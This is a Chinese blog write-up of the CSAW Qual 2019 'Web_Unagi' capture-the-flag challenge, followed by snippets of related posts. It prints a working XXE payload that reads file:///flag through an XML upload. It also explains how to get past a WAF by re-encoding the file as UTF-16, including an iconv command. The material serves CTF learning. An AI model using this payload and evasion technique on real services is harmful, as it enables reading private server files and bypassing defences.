buuctf_练[CSAWQual 2019]Web_Unagi

最新推荐文章于 2024-07-09 20:40:47 发布
最新推荐文章于 2024-07-09 20:40:47 发布
阅读量432 收藏 3
点赞数 2
CC 4.0 BY-SA版权
分类专栏: buuctf刷题 文章标签: 其他 网络安全 笔记 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66225311/article/details/134058739
文章讲述了在2019年CSAWQual比赛中的WebUnagi挑战,涉及XXE漏洞利用,通过UTF-8转UTF-16编码绕过WAF,利用XML文件上传实现命令执行,关键在于理解编码转换和XXE攻击策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[CSAWQual 2019]Web_Unagi

文章目录

掌握知识

XXE漏洞利用,xml文件转换编码绕过WAF(UTF-8 --> UTF-16),xml文件格式的书写

​ 再遇到上传xml文件被拦截,就尝试修改编码再上传,换成其他的编码可能就匹配不到了UTF-16

解题思路

  1. 打开题目链接,有四个关键的导航栏,内容分别为欢迎语,用户信息,上传文件,提示flag/flag

image-20231013192101185

  1. 其中上传文件界面有上传文件的例子,点开发现是xml文件,看来多半是上传xml文件,进行XXE读取flag的利用了

image-20231013192250835

image-20231013192253691

  1. 根据网页上给出的XML的代码,将所有标签都复制下来,添加XXE利用头,再修改一个标签的内容,改成&admin;为了输出命令执行的结果。这里需要添加<intro>标签,因为其他标签长度不够不能显示完整的flag值,改标签能在user界面看到。
<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY admin SYSTEM "file:///flag" >]>
<users>
    <user>
        <username>bob</username>
        <password>passwd2</password>
        <name> Bob</name>
        <email>bob@fakesite.com</email>  
        <group>CSAW2019</group>
        <intro>&admin;</intro>
    </user>
</users>

image-20231013192518334

  1. 最关键的知识点就是,直接上传会被WAF拦截,这里需要用到XML文件转换编码来进行绕过,将UTF-8转换成UTF-16,使用vscode打开,直接在右下角更改编码即可。这个知识点确实第一次知道,记下来,以防后面用到。ctf考的就是知识点的积累,记得的题会,没遇到的知识点就会卡住了。上传编码后的文件,界面会输出flag

image-20231013192659712

image-20231013192830383

关键payload

<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY admin SYSTEM "file:///flag" >]>
<users>
    <user>
        <username>bob</username>
        <password>passwd2</password>
        <name> Bob</name>
        <email>bob@fakesite.com</email>  
        <group>CSAW2019</group>
        <intro>&admin;</intro>
    </user>
</users>
[CSAWQual 2019]Web_Unagi - 文件上传+XXE注入(XML编码绕过)
oZuoShen123的博客
10-10 1571
alice passwd1 Alice [email protected] CSAW2019 bob passwd2 Bob [email protected]
BUUCTF:[CSAWQual 2019]Web_Unagi -- xxe 简单的外部实体bypass ,编码绕过,
Zero_Adam的博客
04-08 778
二、学的的 这个好像是xxe的那啥,默认技巧吧,,utf8上传说有waf,然后就换成utf16进行上传 最近做的xxe的题,都是简单的每waf的。外部实体注入就好了,,, 注意,如果,system的命令 file:///flag。不好使的时候,还可用 PHP的伪协议来做,php://filer/这些来,到时候多试试就好了 三、 WP 初末 看一下iconv命令吧,总不能一个题什么都没学到东西啊, 语句: iconv -f utf8 -t utf16 test.xml -o aaa.xml 这个语句弄上
[CSAWQual 2019]Web_Unagi
snowlyzz的博客
09-13 231
xxe 绕过waf。
[CSAWQual 2019]Unagi
07-27
- *3* [BUUCTF [CSAWQual 2019]Web_Unagi 1](https://blog.csdn.net/weixin_45642610/article/details/120201638)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
XCTF Web 记录(unagi
ximo的博客
03-09 399
unagi 打开页面,四个跳转。 一个提示页面: 一个利用方式提示: 一个利用点: 利用方式: XXE注入。 构造XXE注入代码: <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> <pa
BUUCTF [CSAWQual 2019]Web_Unagi 1
weixin_45642610的博客
09-09 712
BUUCTF [CSAWQual 2019]Web_Unagi 1 提示在/flag 有提示了上传xml文件及其格式 直接用之前xml注入的上传即可。 改文件名为1.xml上传即可得flag <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>&xx
BUUCTF:[CSAWQual 2019]Web_Unagi
末初 · mochu7
04-06 2067
XXE编码转换为UTF-16绕过 2.xml <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> ...
BUUCTF--[CSAWQual 2019]Web_Unagi
qq_46263951的博客
07-22 416
进入页面后看到一个Upload 看到给出的提示是让我们上传一个XML文件,刚好今天做了一个关于XML的XXE漏洞的题,底下贴链接,漏洞点为 给出提示flag在/flag中,所以构造出的payload为 <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <userna.
[CSAWQual 2019]Web_Unagi ---不会编程的崽
不会编程的崽的博客
03-07 643
xxe编码绕过
BUUCTF:[CSAWQual 2019]Web_Unagi
../../../../../../../
06-08 1087
打开界面 看看其他有什么内容: 来看看格式事例: 从信息提示我们可以知道要通过编写xml文件上传 即通过XXE编码转换成utf-16编码绕过 我们可以利用vim编辑xml文件(取名为2.xml) 构造payload如下: <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <
[CSAWQual 2019]Web_Unagi XXE漏洞习题
最新发布
dalaojiaoweb的博客
07-09 395
进来之后我们进行一个信息收集,在upload下可以看到有个here的超链接。点进去之后得到了如下的一些信息。使用我们的Visual Studio Code进行一个编码的转换,因为直接上传会被waf过滤。可以猜到是需要我们利用文件上传包含xxe漏洞利用来得到flag。利用我们学习的xxe漏洞的知识来进行一个模板的套用。最后进行一个文件上传即可得到flag。选择utf-16 LE,然后保存。这道题就是简单的xxe漏洞的注入。
[CSAWQual 2019]Web_Unagi xxe转码绕过waf
qq_54929891的博客
04-28 1527
搜索给我们的信息 flag在flag下面,可能要用到文件读取或者系统命令 可以看到它叫我们上传一个xml文件,应该是xxe漏洞了 这里应该是提示我们会回显哪些属性,可以看到password没有显示出来 利用之前的XXE模板https://xz.aliyun.com/t/6887#toc-0 <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]&gt.
[CSAWQual 2019]Web_Unagi XXE漏洞 [HarekazeCTF2019]Avatar Uploader 1 finfo_file和getimagesize
scrawman的博客
01-27 3253
[CSAWQual 2019]Web_Unagi 看提示有告诉你xml的格式 <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> <password>passwd2</passwor
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值